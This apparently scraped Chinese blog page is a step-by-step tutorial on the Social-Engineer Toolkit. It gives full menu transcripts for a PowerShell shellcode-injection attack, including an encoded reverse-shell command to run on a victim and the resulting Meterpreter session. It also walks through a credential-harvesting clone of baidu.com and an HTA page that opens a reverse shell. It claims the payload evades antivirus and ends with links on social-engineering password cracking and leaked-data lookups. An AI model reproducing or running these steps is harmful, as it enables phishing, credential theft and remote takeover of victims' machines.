社工工具包 SEToolkit
社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种手段,社会工程学的应用领域非常之广泛,而很多黑客也会将社工运用到渗透的方方面面,社工也被称为没有技术,却比技术更强大的渗透方式,正所谓 “攻城为下,攻心为上” 这句话用在社工上面是最恰当不过的啦。
接下来将介绍一个工具,社会工程工具包(SEToolkit)工具,该工具由 David Kennedy (ReL1K)设计并开发,并且有一群活跃的社区合作进行维护工作(www.social-engineer.org),该工具包是开源的并使用Python作为开发语言,其主要目的是协助黑客更好的进行社工活动。
PowerShell 注入攻击
社工工具包中包含一个PowerShell注入攻击的有效载荷,适用于 Win7 - Win10系统使用,因为PowerShell脚本可以很容易的将ShellCode注入到目标的物理内存中,使用该载荷攻击不会触发病毒报警。
1.Kali系统中默认安装了SEToolkit工具,我们只需要运行该工具,然后从主菜单选择 1) Social-Engineering。
root@kali:~# setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.然后在选择下一级菜单中的 9) PowerShell Attack Vectors。
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 9
3.接着我们选择第一个选项,Powershell Alphanumeric Shellcode Injector
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell> 1
4.首先设置好本机的IP地址,我这里是 192.168.1.40 然后等待生成PowerShell脚本,默认放在 /root/.set/reports/powershell/路径下,我们复制里面的内容。
Enter the IPAddress or DNS name for the reverse host: 192.168.1.40
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 380 bytes
Final size of c file: 1622 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes
5.通过各种途径,在被害主机上面执行这一段ShellCode代码。
powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() 'JABOAHgAIAA9ACAAJwAkAEsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAa'"
6.回到Kali,会发现出现了一个会话,使用 sessions -i 查询,上线成功!
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800
msf5 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP @ DESKTOP 192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2)
msf5 exploit(multi/handler) >
SEToolkit 站点克隆
- SEToolkit 还支持站点克隆首先选择,1)Social-Engineering Attacks
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.接着选择,2)Website Attack Vectors
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
- 选择 3)Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>3
4.这里会有三个选项,第一个是使用系统自带的模板,第二个是克隆一个页面,第三个是自定义页面,此处选择2,并输入待克隆页面。
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
SEToolkit HTA 注入攻击
HTA shell注入攻击,生成一个克隆页面,当用户点击运行脚本的时候,会触发反弹一个Shell。
1.根据上方的步骤,重新运行SEToolkit工具然后选择,1)Social-Engineering Attacks
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.选择 2)Website Attack Vectors
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
3.选择 8)HTA Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>8
4.选择 2)Site Cloner,克隆一个站点,然后选择一个攻击载荷,Meterpreter Reverse TCP
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload...
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]:
Enter the port for the reverse payload [443]:
Select the payload you want to deliver:
1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
3. Meterpreter Reverse TCP
Enter the payload number [1-3]: 3
5.用户点击页面,运行脚本以后,成功反弹Shell。
社工工具包 SEToolkit的更多相关文章
- 我是如何社工TDbank获取朋友隐私的
原创 ziwen@beebeeto 转载请保留本行 个人感觉 国外的安全方面对社工的了解和防范并不是很好 即使他们使用社工的时间比我们要长很多 比如 他们的visa在pos机上使用是不需要密码的 而且 ...
- python 模拟ajax查询社工库...
在windows中使用,输入有关信息查询社工库,本来是网页版的,我把ajax请求提取出来.粗略的封装下,挺好玩. #coding:utf8 import urllib2,urllib from Bea ...
- 社工数据搜索引擎搭建 - Build Social Engineer Evildata Search Engine
如何设计搭建一个社工库 从初起设计一个社工库,到现在的Beta,前前后后零零整整花了不下一个月的时间,林林总总记录下来,留给需要之人 泄露数据库格式不一,长相奇葩,因需将用户名.密码.邮箱.哈希等信息 ...
- 常见社工破解WPA2密码方法及防范措施
0×00前言 何为社工?社工是一种通过利用受害者心理弱点,如本能反应.好奇心.同情心.信任.贪婪等进行诸如欺骗.盗取.控制等非法手段的一种攻击方式.在无线安全中也可以利用社工做到许多非法操作.下面举几 ...
- bugku 社工进阶
首先看到的是 由于之前知道有bugku的百度吧 并且这个是一个社工题所以可以试一下这个百度吧 进入百度吧然后会见到 这句话的意思是要我们登录这个账号 但是我们只有账号没有密码 如果爆破的话很有可 ...
- Bugku-CTF社工篇之简单的社工尝试
- Bugku-CTF社工篇之王晓明的日记
- Bugku-CTF社工篇之社工进阶
- Bugku-CTF社工篇之简单的个人信息收集
随机推荐
- 学习GeoServer遇到的问题及答案
简介:本文的记录学习GeoServer遇到的问题,如果已有答案将会附上. 1.GeoServer介绍?,功能? GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 Ge ...
- centos7远程服务器中redis的安装与java连接
1.下载安装redis 在远程服务器中你想下载的位置执行以下命令来下载redis文件到服务器中 $ wget http://download.redis.io/releases/redis-4.0.9 ...
- httpd Apache服务
TCP/IP协议 跨Internet的主机间通讯 在建立通信连接的每一端,进程间的传输要有两个标志: IP地址和端口号,合称为套接字地址 socket address 客户机套接字地址定义了一个唯一的 ...
- arcpy 获得是否为布局mxd.activeView
arcpy 获得是否为布局mxd.activeView print mxd.activeView PAGE_LAYOUT mxd.pageSizePageSize(width=21.590043180 ...
- 组件 computed 与 vuex 中 getters 的使用,及 mapGetters 的使用,对象上追加属性,合并对象
vue 是响应式的数据,这一点相当的方便我们的操作,但有些错误的操作方法会 vue 的响应无效 除此之外我们还要了解 vue.set() 和 Object.assgin() 的使用 vue.set() ...
- CPU分几核几核的是什么意思?
CPU的几核分类其实是按照CPU的地址总线数量来分类的 单核心的地址总线数量是8条 双核心就是16条 三核心就是24 依次类推,核心的多少,只需要知道地址总线的多少,然后除以8就得出来了 地址总线:地 ...
- MySQL中tinytext、text、mediumtext和longtext等各个类型详解
转: MySQL中tinytext.text.mediumtext和longtext等各个类型详解 2018年06月13日 08:55:24 youcijibi 阅读数 26900更多 个人分类: 每 ...
- 14Flutter StatefulWidget有状态组件、页面上绑定数据、改变页面数据、实现计数器功能、动态列表
/** * Flutter StatefulWidget有状态组件.页面上绑定数据.改变页面数据 * 在Flutter中自定义组件其实就是一个类,这个类需要继承StatelessWidget/Stat ...
- 深入理解 iptables 和 netfilter 架构
[译] 深入理解 iptables 和 netfilter 架构 Published at 2019-02-18 | Last Update 译者序 本文翻译自 2015 年的一篇英文博客 A Dee ...
- 使用apache commons net进行ftp传输
apache commons net的maven地址: http://mvnrepository.com/artifact/commons-net/commons-net/3.6 <!-- ht ...